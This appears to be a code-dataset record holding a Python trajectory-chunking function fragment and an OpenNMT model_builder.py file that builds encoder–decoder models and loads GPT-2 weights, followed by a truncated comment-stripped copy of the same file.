#this is the beginning up until the first jump
d = d_raw.iloc[:ji]#.copy()
else:#elif j<Nj:
#this is an intermediate jump
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:ji]#.copy()
# else:
# d = d_raw.iloc[ji:]#.copy()
# for ji in jump_index_array:
#record datum only for long trajectory segments? yes.
if d.t.count()>LT_thresh:
#reset the index back to that of df
# d = d.reindex(d['index'],copy=False).copy()
df.loc[d['index'].values,'cid']=chunk_index
chunk_index +=1
# d_lst.append(d)
return df
# def chunk_traj(df,pid_lst,width=200,height=200,jump_thresh=10., distance_L2_pbc=None, LT_thresh=1):
# d_lst = []
# if distance_L2_pbc is None:
# distance_L2_pbc = get_distance_L2_pbc(width=200,height=200)
# for pid in pid_lst:
# d_raw = df[df.particle==pid].copy()
# #drop any rows before t=100ms
# #drop any rows that already have a value in particle2
# d_raw.reset_index(inplace=True)#,drop=True)
# x_values ,y_values, c_values = d_raw[['x','y', 't']].values.T
#
# jump_index_array, spd_lst = find_jumps(x_values,y_values,distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=jump_thresh)#.25)
# jarry=np.hstack([0,jump_index_array])
# Nj = jarry.shape[0]
# for j,ji in enumerate(jarry):
# if j<Nj-1:
# ji_next=jarry[j+1]
# d = d_raw.iloc[ji:ji_next].copy()
# else:
# d = d_raw.iloc[ji:].copy()
# # for ji in jump_index_array:
# #record datum only for long trajectory segments? yes.
# if d.t.count()>LT_thresh:
# #reset the index back to that of df
# d = d.reindex(d['index'],copy=False).copy()
# d_lst.append(d)
# return d_lst
| 48.038961
| 168
| 0.583671
|
from ..my_initialization import *
from . import *
def chunk_traj(df,pid_lst,width,height, DS, DT, jump_thresh=10., distance_L2_pbc=None, LT_thresh=1, **kwargs):
chunk_index=1
if distance_L2_pbc is None:
distance_L2_pbc = get_distance_L2_pbc(width=width,height=height)
for pid in pid_lst:
d_raw = df[df.particle==pid].copy()
d_raw.reset_index(inplace=True)
x_values, y_values, c_values = d_raw[['x','y', 't']].values.T
jump_index_array, spd_lst = find_jumps_non_pbc(x_values,y_values,distance_L2_pbc=distance_L2_pbc,width=width,height=height, DS=DS,DT=DT, jump_thresh=None)
jarry=np.hstack([jump_index_array,-9999])
Nj = jarry.shape[0]
for j,ji in enumerate(jarry):
if ji==-9999:
if len(jump_index_array)==0:
d = d_raw
else:
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:]
elif j==0:
d = d_raw.iloc[:ji]
else:
ji_prv=jarry[j-1]
d = d_raw.iloc[ji_prv:ji]
if d.t.count()>LT_thresh:
df.loc[d['index'].values,'cid']=chunk_index
chunk_index +=1
return df
| true
| true
|
1c42466f12034657d3309d69a4856592d9ec39cb
| 27,467
|
py
|
Python
|
onmt/model_builder.py
|
mataney/encoder-agnostic-adaptation
|
59d7c2d4fe69f794c7449f0459f00350fcfbbf70
|
[
"MIT"
] | 2
|
2020-01-18T02:07:25.000Z
|
2020-04-16T23:19:03.000Z
|
onmt/model_builder.py
|
mataney/encoder-agnostic-adaptation
|
59d7c2d4fe69f794c7449f0459f00350fcfbbf70
|
[
"MIT"
] | null | null | null |
onmt/model_builder.py
|
mataney/encoder-agnostic-adaptation
|
59d7c2d4fe69f794c7449f0459f00350fcfbbf70
|
[
"MIT"
] | 1
|
2020-01-22T04:01:42.000Z
|
2020-01-22T04:01:42.000Z
|
"""
This file is for models creation, which consults options
and creates each encoder and decoder accordingly.
"""
import re
import math
import copy
import torch
import torch.nn as nn
from torch.nn.init import xavier_uniform_
import onmt.inputters as inputters
import onmt.modules
from onmt.encoders import str2enc
from onmt.decoders import str2dec
from onmt.modules import Embeddings, CopyGenerator, SimpleFusionGenerator
from onmt.modules.util_class import Cast
from onmt.utils.misc import use_gpu
from onmt.utils.logging import logger
from onmt.utils.parse import ArgumentParser
def build_embeddings(opt, text_field, for_encoder=True):
"""
Args:
opt: the option in current environment.
text_field(TextMultiField): word and feats field.
for_encoder(bool): build Embeddings for encoder or decoder?
"""
emb_dim = opt.src_word_vec_size if for_encoder else opt.tgt_word_vec_size
pad_indices = [f.vocab.stoi[f.pad_token] for _, f in text_field]
word_padding_idx, feat_pad_indices = pad_indices[0], pad_indices[1:]
num_embs = [len(f.vocab) for _, f in text_field]
num_word_embeddings, num_feat_embeddings = num_embs[0], num_embs[1:]
fix_word_vecs = opt.fix_word_vecs_enc if for_encoder \
else opt.fix_word_vecs_dec
pos_enc_learned = opt.position_encoding_learned_enc if for_encoder else opt.position_encoding_learned_dec
GPT_representation_mode = opt.GPT_representation_mode if opt.GPT_representation_loc == 'both' or (opt.GPT_representation_loc == 'src' and for_encoder) or (opt.GPT_representation_loc == 'tgt' and not for_encoder) else 'none'
emb = Embeddings(
word_vec_size=emb_dim,
position_encoding=opt.position_encoding,
position_encoding_learned=pos_enc_learned,
position_encoding_ctxsize=opt.position_encoding_ctxsize,
feat_merge=opt.feat_merge,
feat_vec_exponent=opt.feat_vec_exponent,
feat_vec_size=opt.feat_vec_size,
dropout=opt.dropout,
word_padding_idx=word_padding_idx,
feat_padding_idx=feat_pad_indices,
word_vocab_size=num_word_embeddings,
feat_vocab_sizes=num_feat_embeddings,
sparse=opt.optim == "sparseadam",
fix_word_vecs=fix_word_vecs,
GPT_representation_mode=GPT_representation_mode,
GPT_representation_tgt=not for_encoder
)
return emb
def build_encoder(opt, embeddings):
"""
Various encoder dispatcher function.
Args:
opt: the option in current environment.
embeddings (Embeddings): vocab embeddings for this encoder.
"""
enc_type = opt.encoder_type if opt.model_type == "text" else opt.model_type
return str2enc[enc_type].from_opt(opt, embeddings)
def build_decoder(opt, embeddings):
"""
Various decoder dispatcher function.
Args:
opt: the option in current environment.
embeddings (Embeddings): vocab embeddings for this decoder.
"""
dec_type = "ifrnn" if opt.decoder_type == "rnn" and opt.input_feed \
else opt.decoder_type
return str2dec[dec_type].from_opt(opt, embeddings)
def load_test_model(opt, model_path=None):
if model_path is None:
model_path = opt.models[0]
checkpoint = torch.load(model_path,
map_location=lambda storage, loc: storage)
model_opt = ArgumentParser.ckpt_model_opts(checkpoint['opt'])
ArgumentParser.update_model_opts(model_opt)
ArgumentParser.validate_model_opts(model_opt)
vocab = checkpoint['vocab']
if inputters.old_style_vocab(vocab):
fields = inputters.load_old_vocab(
vocab, opt.data_type, dynamic_dict=model_opt.copy_attn
)
else:
fields = vocab
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint,
opt.gpu)
if opt.fp32:
model.float()
model.eval()
model.generator.eval()
return fields, model, model_opt
class PadGen(nn.Module):
def __init__(self):
super(PadGen, self).__init__()
def forward(self, vals):
# Need to make this more general
vals[..., 50257:] = -1e10
return vals
def build_base_model(model_opt, fields, gpu, checkpoint=None, gpu_id=None):
"""Build a model from opts.
Args:
model_opt: the option loaded from checkpoint. It's important that
the opts have been updated and validated. See
:class:`onmt.utils.parse.ArgumentParser`.
fields (dict[str, torchtext.data.Field]):
`Field` objects for the model.
gpu (bool): whether to use gpu.
checkpoint: the model gnerated by train phase, or a resumed snapshot
model from a stopped training.
gpu_id (int or NoneType): Which GPU to use.
Returns:
the NMTModel.
"""
# Build embeddings.
if model_opt.model_type == "text":
src_field = fields["src"]
src_emb = build_embeddings(model_opt, src_field)
else:
src_emb = None
# Build encoder.
encoder = build_encoder(model_opt, src_emb)
# Build decoder.
tgt_field = fields["tgt"]
tgt_emb = build_embeddings(model_opt, tgt_field, for_encoder=False)
# Share the embedding matrix - preprocess with share_vocab required.
if model_opt.share_embeddings:
# src/tgt vocab should be the same if `-share_vocab` is specified.
assert src_field.base_field.vocab == tgt_field.base_field.vocab, \
"preprocess with -share_vocab if you use share_embeddings"
tgt_emb.word_lut.weight = src_emb.word_lut.weight
if model_opt.share_position_embeddings:
tgt_emb.make_embedding.pe.pe.weight = src_emb.make_embedding.pe.pe.weight
decoder = build_decoder(model_opt, tgt_emb)
# Build NMTModel(= encoder + decoder).
if gpu and gpu_id is not None:
device = torch.device("cuda", gpu_id)
elif gpu and not gpu_id:
device = torch.device("cuda")
elif not gpu:
device = torch.device("cpu")
# Build separate LM if doing simple fusion
if model_opt.simple_fusion:
layers = 12
size = 768
heads = 12
lm_decoder_opt = copy.deepcopy(model_opt)
lm_decoder_opt.dec_layers = layers
lm_decoder_opt.use_GPT_version_ctxattn = False
lm_decoder_opt.use_GPT_version_psa = False
lm_decoder_opt.use_GPT_version_unconditional = True
lm_decoder_opt.tgt_word_vec_size = size
lm_decoder_opt.rnn_size = size
lm_decoder_opt.dec_rnn_size = size
lm_decoder_opt.transformer_ff = size*4
lm_decoder_opt.dec_heads = heads
lm_decoder_opt.position_encoding_learned_dec = True
lm_decoder_opt.share_decoder_embeddings = True
lm_decoder_opt.dropout = 0
lm_decoder_emb = build_embeddings(lm_decoder_opt, tgt_field, for_encoder=False)
logger.info(lm_decoder_emb)
lm_decoder = build_decoder(lm_decoder_opt, lm_decoder_emb)
load_decoder = lm_decoder
model = onmt.models.SimpleFusionModel(encoder, decoder, lm_decoder)
generator = SimpleFusionGenerator(model_opt.dec_rnn_size,
lm_decoder_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab))
generator.lm_linear.weight = lm_decoder.embeddings.word_lut.weight
if model_opt.share_decoder_embeddings:
generator.decoder_linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.lm_linear
else:
load_decoder = decoder
if model_opt.unconditional:
model = onmt.models.UncondModel(decoder)
elif model_opt.num_src > 1:
from argparse import Namespace
agenda_field = fields["agenda"]
agenda_opt = Namespace(**model_opt.__dict__)
for k in agenda_opt.__dict__.keys():
if hasattr(model_opt, f"agenda_{k}"):
setattr(agenda_opt, k, getattr(model_opt, f"agenda_{k}"))
agenda_emb = build_embeddings(agenda_opt, agenda_field)
agenda_encoder = build_encoder(model_opt, agenda_emb)
encoders = nn.ModuleList([encoder, agenda_encoder])
model = onmt.neural_checklist.MultiSrcNMTModel(encoders, decoder)
else:
model = onmt.models.NMTModel(encoder, decoder)
# Build Generator.
if not model_opt.copy_attn:
if model_opt.generator_function == "sparsemax":
gen_func = onmt.modules.sparse_activations.LogSparsemax(dim=-1)
else:
gen_func = nn.LogSoftmax(dim=-1)
if model_opt.padded_vocab_fix_me_later:
gen_func = nn.Sequential(PadGen(), gen_func)
generator = nn.Sequential(
nn.Linear(model_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab)),
Cast(torch.float32),
gen_func
)
if model_opt.share_decoder_embeddings:
generator[0].weight = decoder.embeddings.word_lut.weight
gen_linear = generator[0]
else:
tgt_base_field = fields["tgt"].base_field
vocab_size = len(tgt_base_field.vocab)
pad_idx = tgt_base_field.vocab.stoi[tgt_base_field.pad_token]
generator = CopyGenerator(model_opt.dec_rnn_size, vocab_size, pad_idx)
if model_opt.share_decoder_embeddings:
generator.linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.linear
if model_opt.encdec_share_params:
for name, p in decoder.named_parameters():
if 'ctx' in name or 'context' in name:
continue
pointer = encoder
attrs = name.split('.')
for attr_name in attrs[:-1]:
pointer = getattr(pointer, attr_name)
# pointer now has the encoder version of the parameter parent
setattr(pointer, attrs[-1], p)
# Load the model states from checkpoint or initialize them.
if checkpoint is not None:
# Normally, just load the model parameters from checkpoint
if 'gpt2_params' not in checkpoint and 'enc_model' not in checkpoint:
# This preserves backward-compat for models using customed layernorm
def fix_key(s):
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.b_2',
r'\1.layer_norm\2.bias', s)
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.a_2',
r'\1.layer_norm\2.weight', s)
return s
checkpoint['model'] = {fix_key(k): v
for k, v in checkpoint['model'].items()}
# end of patch for backward compatibility
# Initialize rest of parameters normally
if hasattr(model_opt, 'load_uncond_from') and model_opt.load_uncond_from:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
# Always initialize encoder parameters normally
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
model.load_state_dict(checkpoint['model'], strict=False)
generator.load_state_dict(checkpoint['generator'], strict=False)
else:
# load the gpt parameters
if 'gpt2_params' in checkpoint:
init_something = model_opt.gpt2_init_embanddec or model_opt.simple_fusion or model_opt.gpt2_init_embandenc or model_opt.GPT_representation_mode != 'none'
if init_something:
# Initialize all the weights first
if model_opt.gpt2_init_zero:
for p in decoder.parameters():
p.data.zero_()
if model_opt.simple_fusion:
generator.decoder_linear.weight.data.zero_()
generator.decoder_linear.bias.data.zero_()
else:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
# Always initialize encoder parameters normally
if encoder is not None:
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.zero_bias_init:
gen_linear.bias.data.zero_()
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
gen_linear.bias.data.zero_()
load_models = []
if model_opt.GPT_representation_mode != 'none':
load_embs = []
if model_opt.GPT_representation_loc in ['both', 'src']:
load_models.append(src_emb.gpt_model)
load_embs.append(src_emb)
if model_opt.GPT_representation_loc in ['both', 'tgt']:
load_models.append(tgt_emb.gpt_model)
load_embs.append(tgt_emb)
else:
if model_opt.gpt2_init_embanddec or model_opt.simple_fusion:
load_models = [load_decoder]
elif model_opt.gpt2_init_embandenc:
load_models = [encoder]
it_list = list(checkpoint['gpt2_params'])
for lm_idx, load_model in enumerate(load_models):
#print(lm_idx, load_model)
for name, array in it_list:
name = name[6:] # skip "model/"
name = name.split('/')
assigned = False
if name[0] == 'wpe':
if model_opt.GPT_representation_mode != 'none':
pointer = load_embs[lm_idx].make_embedding.pe.pe.weight
else:
pointer = load_model.embeddings.make_embedding.pe.pe.weight
elif name[0] == 'wte':
if model_opt.GPT_representation_mode != 'none':
pointer = [load_embs[lm_idx].make_embedding.emb_luts[0].weight, gen_linear.weight]
else:
pointer = [load_model.embeddings.make_embedding.emb_luts[0].weight]
if not model_opt.nopretrain_decemb:
pointer.append(gen_linear.weight)
if model_opt.simple_fusion and model_opt.sf_pretrain_dec_emb:
pointer.append(decoder.embeddings.make_embedding.emb_luts[0].weight)
elif name[0] == 'ln_f':
if name[1] == 'g':
pointer = load_model.layer_norm.weight
elif name[1] == 'b':
pointer = load_model.layer_norm.bias
else:
raise ValueError('I am missing something here!')
elif name[0][0] == 'h':
layer_num = name[0][1:]
pointer = getattr(load_model.transformer_layers, layer_num)
if name[1] == 'attn':
assigned = True
pointer = pointer.self_attn
full_data = torch.from_numpy(array)
if name[2] == 'c_attn':
end_size = full_data.shape[-1]//3
assert full_data.shape[-1] % 3 == 0
if name[3] == 'b':
if init_something:
pointer.linear_query.bias.data = full_data[:end_size]
pointer.linear_keys.bias.data = full_data[end_size:end_size*2]
pointer.linear_values.bias.data = full_data[end_size*2:]
if model_opt.gpt2_params_std > 0:
pointer.linear_query.bias.orig = full_data[:end_size].clone()
pointer.linear_keys.bias.orig = full_data[end_size:end_size*2].clone()
pointer.linear_values.bias.orig = full_data[end_size*2:].clone()
elif name[3] == 'w':
if init_something:
pointer.linear_query.weight.data = full_data[:, :end_size].t().contiguous()
pointer.linear_keys.weight.data = full_data[:, end_size:end_size*2].t().contiguous()
pointer.linear_values.weight.data = full_data[:, end_size*2:].t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.linear_query.weight.orig = full_data[:, :end_size].t().contiguous().clone()
pointer.linear_keys.weight.orig = full_data[:, end_size:end_size*2].t().contiguous().clone()
pointer.linear_values.weight.orig = full_data[:, end_size*2:].t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[2] == 'c_proj':
if name[3] == 'b':
if init_something:
pointer.final_linear.bias.data = full_data
if model_opt.gpt2_params_std > 0:
pointer.final_linear.bias.orig = full_data.clone()
elif name[3] == 'w':
if init_something:
pointer.final_linear.weight.data = full_data.t().contiguous()
if model_opt.gpt2_params_std > 0:
pointer.final_linear.weight.orig = full_data.t().contiguous().clone()
else:
raise ValueError('I am missing something here!')
elif name[1] == 'ln_1' or name[1] == 'ln_2':
num = name[1][3]
pointer = getattr(pointer, 'layer_norm_'+num)
if name[2] == 'b':
pointer = pointer.bias
elif name[2] == 'g':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
elif name[1] == 'mlp':
pointer = pointer.feed_forward
pointer = getattr(pointer, name[2])
if name[3] == 'b':
pointer = pointer.bias
elif name[3] == 'w':
pointer = pointer.weight
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
else:
raise ValueError('I am missing something here!')
if not assigned:
if name[-1] == 'w' or name[-1] == 'g':
array = array.T
if not isinstance(pointer, list):
pointer = [pointer]
for pointer_i in pointer:
target_size = int(math.ceil(array.shape[0]/8))*8
padded_vocab = name[0] == 'wte' and pointer_i.shape[0] == target_size
padded_vocab = padded_vocab and pointer_i.shape[1:] == array.shape[1:]
try:
assert pointer_i.shape == array.shape or padded_vocab
except AssertionError as e:
e.args += (pointer_i.shape, array.shape)
raise
if init_something:
print("Initialize PyTorch weight {}".format(name))
if padded_vocab:
pointer_i.data[:array.shape[0]] = torch.from_numpy(array)
else:
pointer_i.data = torch.from_numpy(array)
if model_opt.gpt2_params_std > 0:
if padded_vocab:
raise NotImplementedError
else:
pointer_i.orig = torch.from_numpy(array).clone()
if 'enc_model' in checkpoint:
load_dict = {k[8:]: v for k, v in checkpoint['enc_model'] if 'encoder' in k}
encoder.load_state_dict(load_dict, strict=True)
else:
if model_opt.param_init != 0.0:
for p in model.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
for p in generator.parameters():
p.data.uniform_(-model_opt.param_init, model_opt.param_init)
if model_opt.param_init_glorot:
for p in model.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if not model_opt.unconditional and hasattr(model.encoder, 'embeddings') \
and model.encoder.embeddings is not None:
model.encoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_enc)
if hasattr(model.decoder, 'embeddings'):
model.decoder.embeddings.load_pretrained_vectors(
model_opt.pre_word_vecs_dec)
# remove requires_grad from params that are not trained:
if model_opt.notrain_emb or model_opt.notrain_embanddec:
if model_opt.position_encoding_learned_enc and model_opt.share_position_embeddings:
model.encoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
if model_opt.share_embeddings:
model.encoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
model.decoder.embeddings.make_embedding.pe.pe.weight.requires_grad = False
model.decoder.embeddings.make_embedding.emb_luts[0].weight.requires_grad = False
generator[0].weight.requires_grad = False
if model_opt.notrain_genbias:
generator[0].bias.requires_grad = False
if model_opt.notrain_embanddec:
for name, p in load_decoder.layer_norm.named_parameters():
p.requires_grad = False
for name, p in load_decoder.transformer_layers.named_parameters():
if 'context' not in name and 'ctx' not in name: # Takes care of normal and psa versions
p.requires_grad = False
if model_opt.onlytrainln:
for name, p in model.decoder.named_parameters():
if 'layer_norm' not in name:
p.requires_grad = False
for p in generator.parameters():
p.requires_grad = False
if model_opt.onlytrainoutp:
if model_opt.share_decoder_embeddings:
raise ValueError
for p in model.decoder.parameters():
p.requires_grad = False
if model_opt.simple_fusion:
for p in lm_decoder.parameters():
p.requires_grad = False
for p in generator.lm_linear.parameters():
p.requires_grad = False
model.generator = generator
model.to(device)
if model_opt.model_dtype == 'fp16':
model.half()
for p in model.parameters():
if hasattr(p, 'orig'):
p.orig = p.orig.to(device)
if model_opt.model_dtype == 'fp16':
p.orig = p.orig.half()
return model
def linear_repr_patch(self):
return 'in_features={}, out_features={}, bias={}, wgrad={}, bgrad={}'.format(
self.in_features, self.out_features, self.bias is not None,
self.weight.requires_grad, self.bias.requires_grad if self.bias is not None else 'N/A'
)
def ln_repr_patch(self):
string = '{normalized_shape}, eps={eps}, ' \
'elementwise_affine={elementwise_affine}'.format(**self.__dict__)
string += ', wgrad={}, bgrad={}'.format(self.weight.requires_grad if self.weight is not None else 'N/A',
self.bias.requires_grad if self.bias is not None else 'N/A')
return string
def emb_repr_patch(self):
s = '{num_embeddings}, {embedding_dim}'
if self.padding_idx is not None:
s += ', padding_idx={padding_idx}'
if self.max_norm is not None:
s += ', max_norm={max_norm}'
if self.norm_type != 2:
s += ', norm_type={norm_type}'
if self.scale_grad_by_freq is not False:
s += ', scale_grad_by_freq={scale_grad_by_freq}'
if self.sparse is not False:
s += ', sparse=True'
s = s.format(**self.__dict__)
s += ', grad={}'.format(self.weight.requires_grad)
return s
def build_model(model_opt, opt, fields, checkpoint):
logger.info('Building model...')
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint)
# Show which params will be updated
nn.Linear.extra_repr = linear_repr_patch
nn.LayerNorm.extra_repr = ln_repr_patch
nn.Embedding.extra_repr = emb_repr_patch
logger.info(model)
return model
| 44.807504
| 227
| 0.545891
|
import re
import math
import copy
import torch
import torch.nn as nn
from torch.nn.init import xavier_uniform_
import onmt.inputters as inputters
import onmt.modules
from onmt.encoders import str2enc
from onmt.decoders import str2dec
from onmt.modules import Embeddings, CopyGenerator, SimpleFusionGenerator
from onmt.modules.util_class import Cast
from onmt.utils.misc import use_gpu
from onmt.utils.logging import logger
from onmt.utils.parse import ArgumentParser
def build_embeddings(opt, text_field, for_encoder=True):
emb_dim = opt.src_word_vec_size if for_encoder else opt.tgt_word_vec_size
pad_indices = [f.vocab.stoi[f.pad_token] for _, f in text_field]
word_padding_idx, feat_pad_indices = pad_indices[0], pad_indices[1:]
num_embs = [len(f.vocab) for _, f in text_field]
num_word_embeddings, num_feat_embeddings = num_embs[0], num_embs[1:]
fix_word_vecs = opt.fix_word_vecs_enc if for_encoder \
else opt.fix_word_vecs_dec
pos_enc_learned = opt.position_encoding_learned_enc if for_encoder else opt.position_encoding_learned_dec
GPT_representation_mode = opt.GPT_representation_mode if opt.GPT_representation_loc == 'both' or (opt.GPT_representation_loc == 'src' and for_encoder) or (opt.GPT_representation_loc == 'tgt' and not for_encoder) else 'none'
emb = Embeddings(
word_vec_size=emb_dim,
position_encoding=opt.position_encoding,
position_encoding_learned=pos_enc_learned,
position_encoding_ctxsize=opt.position_encoding_ctxsize,
feat_merge=opt.feat_merge,
feat_vec_exponent=opt.feat_vec_exponent,
feat_vec_size=opt.feat_vec_size,
dropout=opt.dropout,
word_padding_idx=word_padding_idx,
feat_padding_idx=feat_pad_indices,
word_vocab_size=num_word_embeddings,
feat_vocab_sizes=num_feat_embeddings,
sparse=opt.optim == "sparseadam",
fix_word_vecs=fix_word_vecs,
GPT_representation_mode=GPT_representation_mode,
GPT_representation_tgt=not for_encoder
)
return emb
def build_encoder(opt, embeddings):
enc_type = opt.encoder_type if opt.model_type == "text" else opt.model_type
return str2enc[enc_type].from_opt(opt, embeddings)
def build_decoder(opt, embeddings):
dec_type = "ifrnn" if opt.decoder_type == "rnn" and opt.input_feed \
else opt.decoder_type
return str2dec[dec_type].from_opt(opt, embeddings)
def load_test_model(opt, model_path=None):
if model_path is None:
model_path = opt.models[0]
checkpoint = torch.load(model_path,
map_location=lambda storage, loc: storage)
model_opt = ArgumentParser.ckpt_model_opts(checkpoint['opt'])
ArgumentParser.update_model_opts(model_opt)
ArgumentParser.validate_model_opts(model_opt)
vocab = checkpoint['vocab']
if inputters.old_style_vocab(vocab):
fields = inputters.load_old_vocab(
vocab, opt.data_type, dynamic_dict=model_opt.copy_attn
)
else:
fields = vocab
model = build_base_model(model_opt, fields, use_gpu(opt), checkpoint,
opt.gpu)
if opt.fp32:
model.float()
model.eval()
model.generator.eval()
return fields, model, model_opt
class PadGen(nn.Module):
def __init__(self):
super(PadGen, self).__init__()
def forward(self, vals):
vals[..., 50257:] = -1e10
return vals
def build_base_model(model_opt, fields, gpu, checkpoint=None, gpu_id=None):
if model_opt.model_type == "text":
src_field = fields["src"]
src_emb = build_embeddings(model_opt, src_field)
else:
src_emb = None
encoder = build_encoder(model_opt, src_emb)
tgt_field = fields["tgt"]
tgt_emb = build_embeddings(model_opt, tgt_field, for_encoder=False)
if model_opt.share_embeddings:
assert src_field.base_field.vocab == tgt_field.base_field.vocab, \
"preprocess with -share_vocab if you use share_embeddings"
tgt_emb.word_lut.weight = src_emb.word_lut.weight
if model_opt.share_position_embeddings:
tgt_emb.make_embedding.pe.pe.weight = src_emb.make_embedding.pe.pe.weight
decoder = build_decoder(model_opt, tgt_emb)
if gpu and gpu_id is not None:
device = torch.device("cuda", gpu_id)
elif gpu and not gpu_id:
device = torch.device("cuda")
elif not gpu:
device = torch.device("cpu")
if model_opt.simple_fusion:
layers = 12
size = 768
heads = 12
lm_decoder_opt = copy.deepcopy(model_opt)
lm_decoder_opt.dec_layers = layers
lm_decoder_opt.use_GPT_version_ctxattn = False
lm_decoder_opt.use_GPT_version_psa = False
lm_decoder_opt.use_GPT_version_unconditional = True
lm_decoder_opt.tgt_word_vec_size = size
lm_decoder_opt.rnn_size = size
lm_decoder_opt.dec_rnn_size = size
lm_decoder_opt.transformer_ff = size*4
lm_decoder_opt.dec_heads = heads
lm_decoder_opt.position_encoding_learned_dec = True
lm_decoder_opt.share_decoder_embeddings = True
lm_decoder_opt.dropout = 0
lm_decoder_emb = build_embeddings(lm_decoder_opt, tgt_field, for_encoder=False)
logger.info(lm_decoder_emb)
lm_decoder = build_decoder(lm_decoder_opt, lm_decoder_emb)
load_decoder = lm_decoder
model = onmt.models.SimpleFusionModel(encoder, decoder, lm_decoder)
generator = SimpleFusionGenerator(model_opt.dec_rnn_size,
lm_decoder_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab))
generator.lm_linear.weight = lm_decoder.embeddings.word_lut.weight
if model_opt.share_decoder_embeddings:
generator.decoder_linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.lm_linear
else:
load_decoder = decoder
if model_opt.unconditional:
model = onmt.models.UncondModel(decoder)
elif model_opt.num_src > 1:
from argparse import Namespace
agenda_field = fields["agenda"]
agenda_opt = Namespace(**model_opt.__dict__)
for k in agenda_opt.__dict__.keys():
if hasattr(model_opt, f"agenda_{k}"):
setattr(agenda_opt, k, getattr(model_opt, f"agenda_{k}"))
agenda_emb = build_embeddings(agenda_opt, agenda_field)
agenda_encoder = build_encoder(model_opt, agenda_emb)
encoders = nn.ModuleList([encoder, agenda_encoder])
model = onmt.neural_checklist.MultiSrcNMTModel(encoders, decoder)
else:
model = onmt.models.NMTModel(encoder, decoder)
if not model_opt.copy_attn:
if model_opt.generator_function == "sparsemax":
gen_func = onmt.modules.sparse_activations.LogSparsemax(dim=-1)
else:
gen_func = nn.LogSoftmax(dim=-1)
if model_opt.padded_vocab_fix_me_later:
gen_func = nn.Sequential(PadGen(), gen_func)
generator = nn.Sequential(
nn.Linear(model_opt.dec_rnn_size,
len(fields["tgt"].base_field.vocab)),
Cast(torch.float32),
gen_func
)
if model_opt.share_decoder_embeddings:
generator[0].weight = decoder.embeddings.word_lut.weight
gen_linear = generator[0]
else:
tgt_base_field = fields["tgt"].base_field
vocab_size = len(tgt_base_field.vocab)
pad_idx = tgt_base_field.vocab.stoi[tgt_base_field.pad_token]
generator = CopyGenerator(model_opt.dec_rnn_size, vocab_size, pad_idx)
if model_opt.share_decoder_embeddings:
generator.linear.weight = decoder.embeddings.word_lut.weight
gen_linear = generator.linear
if model_opt.encdec_share_params:
for name, p in decoder.named_parameters():
if 'ctx' in name or 'context' in name:
continue
pointer = encoder
attrs = name.split('.')
for attr_name in attrs[:-1]:
pointer = getattr(pointer, attr_name)
setattr(pointer, attrs[-1], p)
if checkpoint is not None:
if 'gpt2_params' not in checkpoint and 'enc_model' not in checkpoint:
def fix_key(s):
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.b_2',
r'\1.layer_norm\2.bias', s)
s = re.sub(r'(.*)\.layer_norm((_\d+)?)\.a_2',
r'\1.layer_norm\2.weight', s)
return s
checkpoint['model'] = {fix_key(k): v
for k, v in checkpoint['model'].items()}
if hasattr(model_opt, 'load_uncond_from') and model_opt.load_uncond_from:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
model.load_state_dict(checkpoint['model'], strict=False)
generator.load_state_dict(checkpoint['generator'], strict=False)
else:
if 'gpt2_params' in checkpoint:
init_something = model_opt.gpt2_init_embanddec or model_opt.simple_fusion or model_opt.gpt2_init_embandenc or model_opt.GPT_representation_mode != 'none'
if init_something:
if model_opt.gpt2_init_zero:
for p in decoder.parameters():
p.data.zero_()
if model_opt.simple_fusion:
generator.decoder_linear.weight.data.zero_()
generator.decoder_linear.bias.data.zero_()
else:
for p in decoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if encoder is not None:
for p in encoder.parameters():
if p.dim() > 1:
xavier_uniform_(p)
for p in generator.parameters():
if p.dim() > 1:
xavier_uniform_(p)
if model_opt.zero_bias_init:
gen_linear.bias.data.zero_()
if model_opt.ctx_weight_param:
for name, p in decoder.named_parameters():
if 'ctx_weight' in name:
p.data.zero_()
if 'ctx_bias' in name:
p.data.fill_(-10)
gen_linear.bias.data.zero_()
load_models = []
if model_opt.GPT_representation_mode != 'none':
load_embs = []
if model_opt.GPT_representation_loc in ['both', 'src']:
load_models.append(src_emb.gpt_model)
load_embs.append(src_emb)
if model_opt.GPT_representation_loc in ['both', 'tgt']:
